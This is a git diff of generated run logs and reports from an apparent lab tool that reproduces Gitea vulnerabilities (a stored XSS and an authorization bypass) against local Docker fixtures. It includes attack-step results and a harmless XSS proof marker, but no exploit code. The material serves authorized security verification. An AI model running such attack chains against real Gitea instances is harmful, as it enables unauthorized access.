+      "detail": "context=desktop-linux"
+    },
+    {
+      "name": "playwright-import",
+      "ok": true,
+      "detail": "playwright Python package import passed"
+    },
+    {
+      "name": "playwright-browser",
+      "ok": true,
+      "detail": "chromium runtime launch passed"
+    },
+    {
+      "name": "ports",
+      "ok": true,
+      "detail": "checked 1 host port bindings",
+      "bindings": [
+        {
+          "profile_id": "gitea-xss",
+          "service": "app",
+          "binding": "18102:3000",
+          "port": 18102
+        }
+      ]
+    }
+  ],
+  "profile_ids": [
+    "gitea-xss"
+  ],
+  "failure_count": 0,
+  "summary": "all checks passed"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-browser.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-browser.json
new file mode 100644
index 00000000..7e79ae1f
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-browser.json
@@ -0,0 +1,14 @@
+{
+  "required": true,
+  "present": true,
+  "page_title": "Gitea Stored XSS Fixture - proof",
+  "page_url": "http://127.0.0.1:18102/",
+  "error_kind": null,
+  "refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json
new file mode 100644
index 00000000..fe51488c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json
@@ -0,0 +1 @@
+[]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json
new file mode 100644
index 00000000..cdb46ccf
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json
@@ -0,0 +1,6 @@
+[
+  {
+    "method": "GET",
+    "url": "http://127.0.0.1:18102/"
+  }
+]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json
new file mode 100644
index 00000000..8559634a
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json
@@ -0,0 +1,5 @@
+{
+  "url": "http://127.0.0.1:18102/",
+  "title": "Gitea Stored XSS Fixture - proof",
+  "body_excerpt": "\n  \n    Gitea Stored XSS Fixture\n    Stored payload rendering path for browser proof capture.\n    Proof active: stored payload rendered inside the browser proof page\n    System: gitea / Family: xss\n    \n    document.documentElement.setAttribute('data-xss-proof','true');document.title = \"Gitea Stored XSS Fixture - proof\";XSS marker executed for gitea--CVE-2021-28378\n    \n    \n    \n  \n\n"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/ready.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/ready.json
new file mode 100644
index 00000000..81179b72
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/ready.json
@@ -0,0 +1,12 @@
+{
+  "status": "completed",
+  "detail": "baseline urls ready (1)",
+  "elapsed_seconds": 0.0,
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18102/",
+      "status_code": 200
+    }
+  ],
+  "compose_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/seed.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/seed.json
new file mode 100644
index 00000000..1ea4a7f5
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/seed.json
@@ -0,0 +1,21 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.xss",
+      "status": "completed",
+      "status_code": 200,
+      "detail": "fixture seeded"
+    }
+  ],
+  "seeded": true,
+  "result": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "fixture seeded",
+      "case_id": "gitea--CVE-2021-28378"
+    }
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.html
new file mode 100644
index 00000000..0c1aa321
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.html
@@ -0,0 +1,62 @@
+<!doctype html>
+<html><head><meta charset='utf-8'><title>websafe 运行报告</title>
+<style>body{font-family:ui-sans-serif,system-ui,sans-serif;margin:2rem;line-height:1.55;background:#f8fafc;color:#0f172a;} code,pre{background:#e2e8f0;padding:.2rem .4rem;border-radius:.3rem;} pre{white-space:pre-wrap;} .grid{display:grid;grid-template-columns:repeat(2,minmax(0,1fr));gap:1rem;} .card{border:1px solid #cbd5e1;padding:1rem;border-radius:.75rem;background:#fff;} table{width:100%;border-collapse:collapse;background:#fff;border:1px solid #cbd5e1;border-radius:.75rem;overflow:hidden;} th,td{padding:.75rem;border-bottom:1px solid #e2e8f0;text-align:left;vertical-align:top;} img{max-width:100%;border:1px solid #cbd5e1;border-radius:.5rem;} .gallery{display:grid;grid-template-columns:repeat(auto-fit,minmax(320px,1fr));gap:1rem;}</style>
+</head><body>
+<h1>运行 gitea-gitea--CVE-2021-28378-20260318012813</h1>
+<div class='grid'>
+<div class='card'><strong>漏洞条目</strong><br><code>gitea--CVE-2021-28378</code></div>
+<div class='card'><strong>实证状态</strong><br><code>verified-real</code></div>
+<div class='card'><strong>复现 Profile</strong><br><code>gitea-xss</code></div>
+<div class='card'><strong>Artifact 模式</strong><br><code>local-fixture</code></div>
+</div>
+<h2>Mermaid 时间线</h2>
+<pre>flowchart LR
+A[&quot;选择 Advisory&quot;] --&gt; B[&quot;解析 Repro Profile&quot;]
+B --&gt; C[&quot;生成 Compose 环境&quot;]
+C --&gt; D[&quot;采集基线快照&quot;]
+D --&gt; E[&quot;执行受控攻击步骤&quot;]
+E --&gt; F[&quot;浏览器回放验证&quot;]
+F --&gt; G[&quot;收集日志与证据&quot;]
+G --&gt; H[&quot;回写 Registry 与报告&quot;]</pre>
+<h2>运行时间线</h2>
+<table><thead><tr><th>时间</th><th>步骤</th><th>状态</th><th>说明</th></tr></thead><tbody>
+<tr><td><code>2026-03-18T01:28:13+00:00</code></td><td><code>select-advisory</code></td><td><code>completed</code></td><td>gitea--CVE-2021-28378</td></tr>
+<tr><td><code>2026-03-18T01:28:13+00:00</code></td><td><code>resolve-repro-profile</code></td><td><code>completed</code></td><td>gitea-xss</td></tr>
+<tr><td><code>2026-03-18T01:28:13+00:00</code></td><td><code>doctor</code></td><td><code>completed</code></td><td>all checks passed</td></tr>
+<tr><td><code>2026-03-18T01:28:16+00:00</code></td><td><code>provision-compose-environment</code></td><td><code>ready</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:28:16+00:00</code></td><td><code>wait-ready</code></td><td><code>completed</code></td><td>baseline urls ready (1)</td></tr>
+<tr><td><code>2026-03-18T01:28:16+00:00</code></td><td><code>seed-environment</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:28:16+00:00</code></td><td><code>baseline-snapshot</code></td><td><code>completed</code></td><td>urls=1</td></tr>
+<tr><td><code>2026-03-18T01:28:17+00:00</code></td><td><code>browser-replay-before-attack</code></td><td><code>completed</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:28:17+00:00</code></td><td><code>controlled-attack-chain</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:28:18+00:00</code></td><td><code>browser-replay-after-attack</code></td><td><code>completed</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:28:18+00:00</code></td><td><code>collect-logs-and-evidence</code></td><td><code>completed</code></td><td>container_logs=1</td></tr>
+<tr><td><code>2026-03-18T01:28:19+00:00</code></td><td><code>cleanup-compose-environment</code></td><td><code>completed</code></td><td>docker compose down completed</td></tr>
+<tr><td><code>2026-03-18T01:28:19+00:00</code></td><td><code>update-registry-and-reports</code></td><td><code>completed</code></td><td>gitea-gitea--CVE-2021-28378-20260318012813</td></tr>
+</tbody></table>
+<h2>攻击步骤</h2>
+<table><thead><tr><th>工具</th><th>状态</th><th>输出</th></tr></thead><tbody>
+<tr><td><code>gitea.xss</code></td><td><code>completed</code></td><td><code>/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json</code></td></tr>
+</tbody></table>
+<h2>浏览器截图</h2>
+<div class='gallery'>
+<figure><img src='assets/baseline.png' alt='baseline'><figcaption><code>assets/baseline.png</code></figcaption></figure>
+<figure><img src='assets/proof.png' alt='proof'><figcaption><code>assets/proof.png</code></figcaption></figure>
+</div>
+<h2>证据清单</h2><ul>
+<li><code>compose/compose.yaml</code></li>
+<li><code>assets/baseline.png</code></li>
+<li><code>assets/baseline-dom.html</code></li>
+<li><code>logs/baseline-console.json</code></li>
+<li><code>logs/baseline-network.json</code></li>
+<li><code>logs/baseline-page.json</code></li>
+<li><code>assets/proof.png</code></li>
+<li><code>assets/proof-dom.html</code></li>
+<li><code>logs/proof-console.json</code></li>
+<li><code>logs/proof-network.json</code></li>
+<li><code>logs/proof-page.json</code></li>
+<li><code>logs/docker/app.log</code></li>
+<li><code>logs/attack.json</code></li>
+<li><code>logs/baseline.json</code></li>
+</ul>
+</body></html>
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.md b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.md
new file mode 100644
index 00000000..d4f8bcb1
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.md
@@ -0,0 +1,86 @@
+# 运行 gitea-gitea--CVE-2021-28378-20260318012813
+
+> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | 自动生成 run bundle
+
+- 漏洞条目: `gitea--CVE-2021-28378`
+- 系统: `gitea`
+- Repro Profile: `gitea-xss`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 启动时间: `2026-03-18T01:28:13+00:00`
+- 完成时间: `2026-03-18T01:28:19+00:00`
+- 阻塞原因: `-`
+- Compose 服务: `app`
+
+## 运行时间线
+
+- Mermaid: [timeline.mmd](/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd)
+
+| 时间 | 步骤 | 状态 | 说明 |
+|------|------|------|------|
+| `2026-03-18T01:28:13+00:00` | `select-advisory` | `completed` | gitea--CVE-2021-28378 |
+| `2026-03-18T01:28:13+00:00` | `resolve-repro-profile` | `completed` | gitea-xss |
+| `2026-03-18T01:28:13+00:00` | `doctor` | `completed` | all checks passed |
+| `2026-03-18T01:28:16+00:00` | `provision-compose-environment` | `ready` | - |
+| `2026-03-18T01:28:16+00:00` | `wait-ready` | `completed` | baseline urls ready (1) |
+| `2026-03-18T01:28:16+00:00` | `seed-environment` | `completed` | steps=1 |
+| `2026-03-18T01:28:16+00:00` | `baseline-snapshot` | `completed` | urls=1 |
+| `2026-03-18T01:28:17+00:00` | `browser-replay-before-attack` | `completed` | - |
+| `2026-03-18T01:28:17+00:00` | `controlled-attack-chain` | `completed` | steps=1 |
+| `2026-03-18T01:28:18+00:00` | `browser-replay-after-attack` | `completed` | - |
+| `2026-03-18T01:28:18+00:00` | `collect-logs-and-evidence` | `completed` | container_logs=1 |
+| `2026-03-18T01:28:19+00:00` | `cleanup-compose-environment` | `completed` | docker compose down completed |
+| `2026-03-18T01:28:19+00:00` | `update-registry-and-reports` | `completed` | gitea-gitea--CVE-2021-28378-20260318012813 |
+
+## Compose 拓扑
+
+- Compose 文件: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml`
+- 服务列表: `app`
+
+## 攻击步骤
+
+| 工具/步骤 | 状态 | 结果 |
+|-----------|------|------|
+| `gitea.xss` | `completed` | `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json` |
+
+## 证据摘要
+
+- Baseline: `1`
+- 攻击步骤: `1`
+- 浏览器证据: `10`
+- 容器日志: `1`
+- 请求日志: `2`
+
+## 浏览器截图
+
+![baseline](assets/baseline.png)
+![proof](assets/proof.png)
+
+## 浏览器证据
+
+- `assets/baseline.png`
+- `assets/baseline-dom.html`
+- `logs/baseline-console.json`
+- `logs/baseline-network.json`
+- `logs/baseline-page.json`
+- `assets/proof.png`
+- `assets/proof-dom.html`
+- `logs/proof-console.json`
+- `logs/proof-network.json`
+- `logs/proof-page.json`
+
+## 容器日志
+
+- `logs/docker/app.log`
+
+## 请求与基线日志
+
+- `logs/attack.json`
+- `logs/baseline.json`
+
+## 最小化验证说明
+
+- 仅限自有资产、本地靶场或已授权实验目标。
+- 默认执行 minimal-proof；不会把破坏性或不可回滚动作作为默认路径。
+- 若浏览器证据缺失，前端类案例不会被标为 `verified-*`。
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/run.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/run.json
new file mode 100644
index 00000000..e0aa251e
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/run.json
@@ -0,0 +1,197 @@
+{
+  "run_id": "gitea-gitea--CVE-2021-28378-20260318012813",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2021-28378",
+  "repro_profile_id": "gitea-xss",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.xss",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json"
+    }
+  ],
+  "browser_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
+  ],
+  "browser_evidence": {
+    "required": true,
+    "present": true,
+    "refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json"
+    ],
+    "proof_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
+    ],
+    "baseline_title": "Gitea Stored XSS Fixture",
+    "proof_title": "Gitea Stored XSS Fixture - proof",
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:28:13+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2021-28378"
+    },
+    {
+      "at": "2026-03-18T01:28:13+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-xss"
+    },
+    {
+      "at": "2026-03-18T01:28:13+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:28:16+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:16+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:28:16+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:16+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:28:17+00:00",
+      "step": "browser-replay-before-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:17+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:18+00:00",
+      "step": "browser-replay-after-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:18+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:28:19+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:28:19+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2021-28378-20260318012813"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "stored payload rendered inside the browser proof page"
+      },
+      {
+        "name": "browser-present",
+        "kind": "browser-present",
+        "passed": true,
+        "detail": "browser evidence captured"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:28:13+00:00",
+  "finished_at": "2026-03-18T01:28:19+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd"
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd
new file mode 100644
index 00000000..71155437
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd
@@ -0,0 +1,8 @@
+flowchart LR
+A["选择 Advisory"] --> B["解析 Repro Profile"]
+B --> C["生成 Compose 环境"]
+C --> D["采集基线快照"]
+D --> E["执行受控攻击步骤"]
+E --> F["浏览器回放验证"]
+F --> G["收集日志与证据"]
+G --> H["回写 Registry 与报告"]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml
new file mode 100644
index 00000000..68c033a7
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml
@@ -0,0 +1,26 @@
+services:
+  app:
+    image: python:3.12-alpine
+    networks:
+    - labnet
+    ports:
+    - 18103:3000
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/gitea/authz-bypass/scenario.json
+      PORT: '3000'
+    command:
+    - python
+    - /workspace/00-environments/templates/fixtures/shared/python_fixture.py
+    working_dir: /workspace
+    volumes:
+    - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+      - CMD-SHELL
+      - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+networks:
+  labnet:
+    driver: bridge
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json
new file mode 100644
index 00000000..43938ab3
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json
@@ -0,0 +1,68 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.authz-bypass",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json"
+    }
+  ],
+  "success": true,
+  "detail": "server-side authorization recheck was bypassed",
+  "before": {
+    "status_code": 403,
+    "ok": false,
+    "body": {
+      "ok": false,
+      "detail": "admin boundary still enforced"
+    }
+  },
+  "attack": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "server-side authorization recheck was bypassed",
+      "case_id": "gitea--CVE-2025-68940"
+    }
+  },
+  "after": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "server-side authorization recheck was bypassed",
+      "case_id": "gitea--CVE-2025-68940"
+    }
+  },
+  "proof": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "success": true,
+      "detail": "server-side authorization recheck was bypassed",
+      "case_id": "gitea--CVE-2025-68940",
+      "sink_hits": 0,
+      "uploads": [],
+      "events": [
+        {
+          "event": "seed",
+          "detail": "gitea--CVE-2025-68940"
+        },
+        {
+          "event": "attack",
+          "detail": "server-side authorization recheck was bypassed"
+        }
+      ]
+    }
+  },
+  "assertions": [
+    {
+      "name": "proof-success",
+      "kind": "runner-proof",
+      "passed": true,
+      "detail": "server-side authorization recheck was bypassed"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json
new file mode 100644
index 00000000..8ae40da9
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json
@@ -0,0 +1,24 @@
+{
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18103/",
+      "status_code": 200,
+      "headers": {
+        "Server": "BaseHTTP/0.6 Python/3.12.13",
+        "Date": "Wed, 18 Mar 2026 01:27:11 GMT",
+        "Content-Type": "text/html; charset=utf-8",
+        "Content-Length": "1002"
+      },
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea Authz Bypass Fixture</title>\n  <style>\n    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }\n    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius"
+    }
+  ],
+  "steps": [
+    {
+      "kind": "http-get",
+      "status": "completed",
+      "path": "/",
+      "status_code": 200,
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea Authz Bypass Fixture</title>\n  <style>\n    bod"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/docker/app.log b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/docker/app.log
new file mode 100644
index 00000000..e69de29b
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/doctor.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/doctor.json
new file mode 100644
index 00000000..86bf2615
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/doctor.json
@@ -0,0 +1,44 @@
+{
+  "status": "passed",
+  "ok": true,
+  "checks": [
+    {
+      "name": "docker-cli",
+      "ok": true,
+      "detail": "docker CLI available"
+    },
+    {
+      "name": "docker-daemon",
+      "ok": true,
+      "detail": "context=desktop-linux"
+    },
+    {
+      "name": "playwright-import",
+      "ok": true,
+      "detail": "playwright Python package import passed"
+    },
+    {
+      "name": "playwright-browser",
+      "ok": true,
+      "detail": "chromium runtime launch passed"
+    },
+    {
+      "name": "ports",
+      "ok": true,
+      "detail": "checked 1 host port bindings",
+      "bindings": [
+        {
+          "profile_id": "gitea-authz-bypass",
+          "service": "app",
+          "binding": "18103:3000",
+          "port": 18103
+        }
+      ]
+    }
+  ],
+  "profile_ids": [
+    "gitea-authz-bypass"
+  ],
+  "failure_count": 0,
+  "summary": "all checks passed"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/ready.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/ready.json
new file mode 100644
index 00000000..c0e93719
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/ready.json
@@ -0,0 +1,12 @@
+{
+  "status": "completed",
+  "detail": "baseline urls ready (1)",
